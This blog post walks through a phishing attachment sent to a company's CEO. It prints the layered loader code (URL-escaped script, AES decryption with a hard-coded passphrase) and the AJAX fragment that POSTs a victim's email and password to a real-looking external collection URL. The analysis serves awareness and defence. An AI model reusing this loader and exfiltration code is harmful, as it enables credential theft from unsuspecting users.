How they tried to compromise our CEO and what a phishing email contains

Are you curious about what is inside those phishing emails and how they try to steal your password?

This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.

A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.

Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.

Content of phishing email

This is the email. It has an attachment. Looks kind of real.

This is how the attachment looks:

What you could do:

  1. Check the sender.
  2. Ask your CTO/Admin/Security or somebody with good technical knowledge whether this email is legit.
  3. Don’t click on attachments.

The attachment is an HTM file

On Microsoft Windows machines this file is executable: it opens in the web browser, which runs the code inside it. Let's see the content of this file if you open it with a text editor:

A sample of it is:

<script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>

This file contains an HTML document. HTML is the format of webpages and once you click on this file it will open your web browser and the web browser will execute this file.

Note: Don’t click on such attachments.

What is unescape?

The unescape here means that the string

‘%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..’ is encoded.

‘unescape’ is a function that reverses that encoding: every ‘%XX’ is turned back into the character with that code. It is technical, but the end result is a file that all browsers can read.

The result of unescaping the content looks like:

<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
<script>
function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
    var obj_json = JSON.parse(encrypted_json_string);
    var encrypted = obj_json.ciphertext;
    var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
    var iv = CryptoJS.enc.Hex.parse(obj_json.iv);
    var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
    var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
    return decrypted.toString(CryptoJS.enc.Utf8);
}
document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE

Here is what happens in the code in simple terms:

There is an encrypted text called “ciphertext”. The key is derived from the hard-coded passphrase, the ciphertext is decrypted with it, and the result is written into the page and executed. This happens on the last line of the fragment above.

So the phishing mail contains an attachment, the attachment is ‘escaped’, and the ‘escaped’ content carries an encrypted page.

What’s the content of the ciphertext?

The cipher text contains a web page that your browser will display. It looks like a real web page. It looks like a real Microsoft 365 page.

Here is a screenshot:

Where you see “pesho@gmail.com” in the screenshot, you would see your own email address.
This makes the page look more real to you.

The summary so far: the phishing email contains an attachment with executable HTML code, the code is escaped, the escaped content holds an encrypted page, and the encrypted page is an HTML login page that looks like Microsoft's.

What happens when you fill your email and password?

There is a fragment of the code of the page that looks like this:

count=count+1
  $.ajax({
    dataType: 'JSON',
    url: 'https://sintracoopmn.com.br/process.php',
    type: 'POST',
    data:{
      email:email,
      password:password,
      detail:detail,

    },

This code will send your email and password to the following web address: https://sintracoopmn.com.br/process.php

Let’s try it.

I enter the username pesho@gmail.com with the password ‘abcd1234’.

Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but it will also log me in to my Office 365 account.

So I would not even notice that I had been compromised.

What can you do?

Add two-factor authentication.

That’s the easiest, most secure solution. Add two-factor authentication that will send you an SMS every time you log in or will require you to use an authenticator app.

If you haven’t done it already, I would advise you to do it now.